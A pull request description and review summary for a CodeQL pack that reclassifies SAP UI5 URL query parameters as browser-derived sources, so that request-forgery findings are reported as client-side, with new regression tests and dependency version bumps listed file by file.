Client side request forgery from jQuery.sap.getUriParameters()

[mbaluda]

• Improves the data extension for SAP UI5 to more accurately model browser URL query sources and adds new tests for request forgery vulnerabilities.
• Based on the MaD input kind browser-url-query, the alert is now correctly classified as "ClientSideRequestForgery" and not as "RequestForgery"
• Updates version number to 2.25.0

[Copilot]

Pull request overview

Updates SAP UI5 source modeling to treat URL query parameters as browser-derived inputs and adds regression tests ensuring request-forgery alerts are classified as client-side rather than server-side.

Changes:

• Model UI5URIParameters.get/getAll return values as browser-url-query sources in the UI5 data extension.
• Add UI5 test cases asserting ClientSideRequestForgery fires (and RequestForgery does not) for URL-query-controlled XHR.
• Bump codeql/javascript-all (and internal pack dependencies) to align packs/tests with the new modeling.

Reviewed changes

Copilot reviewed 22 out of 22 changed files in this pull request and generated no comments.

Show a summary per file

File	Description
javascript/heuristic-models/tests/qlpack.yml	Bump JS pack dependency versions used by heuristic-model tests.
javascript/heuristic-models/ext/qlpack.yml	Update extension target codeql/javascript-all version range.
javascript/frameworks/xsjs/test/qlpack.yml	Align XSJS tests with updated codeql/javascript-all and internal pack versions.
javascript/frameworks/xsjs/src/qlpack.yml	Align XSJS queries pack dependencies to updated versions.
javascript/frameworks/xsjs/lib/qlpack.yml	Bump codeql/javascript-all dependency for XSJS “all” pack.
javascript/frameworks/xsjs/ext/qlpack.yml	Update extension target codeql/javascript-all version range for XSJS models.
javascript/frameworks/ui5/test/queries/RequestForgery/test.js	New minimal repro: URL query param flows into XHR request URL.
javascript/frameworks/ui5/test/queries/RequestForgery/RequestForgery.qlref	New regression target for server-side RequestForgery query (expecting no result).
javascript/frameworks/ui5/test/queries/RequestForgery/RequestForgery.expected	Expected output asserting no RequestForgery finding for browser URL-query input.
javascript/frameworks/ui5/test/queries/RequestForgery/ClientSideRequestForgery.qlref	New regression target for ClientSideRequestForgery query.
javascript/frameworks/ui5/test/queries/RequestForgery/ClientSideRequestForgery.expected	Expected output asserting a client-side request-forgery finding.
javascript/frameworks/ui5/test/qlpack.yml	Align UI5 tests with updated codeql/javascript-all and internal pack versions.
javascript/frameworks/ui5/test/models/source/sourceTest.expected	Update expected source-kind classification for UI5 URL parameter sources.
javascript/frameworks/ui5/src/qlpack.yml	Align UI5 queries pack dependencies to updated versions.
javascript/frameworks/ui5/lib/qlpack.yml	Bump codeql/javascript-all dependency for UI5 “all” pack.
javascript/frameworks/ui5/ext/ui5.model.yml	Change UI5 URI parameter sources to browser-url-query.
javascript/frameworks/ui5/ext/qlpack.yml	Update extension target codeql/javascript-all version range for UI5 models.
javascript/frameworks/ui5-webcomponents/test/qlpack.yml	Align UI5-webcomponents tests with updated codeql/javascript-all and internal pack versions.
javascript/frameworks/cap/test/qlpack.yml	Align CAP tests with updated codeql/javascript-all and internal pack versions.
javascript/frameworks/cap/src/qlpack.yml	Align CAP queries pack dependencies to updated versions.
javascript/frameworks/cap/lib/qlpack.yml	Bump codeql/javascript-all dependency for CAP “all” pack.
javascript/frameworks/cap/ext/qlpack.yml	Update extension target codeql/javascript-all version range for CAP models.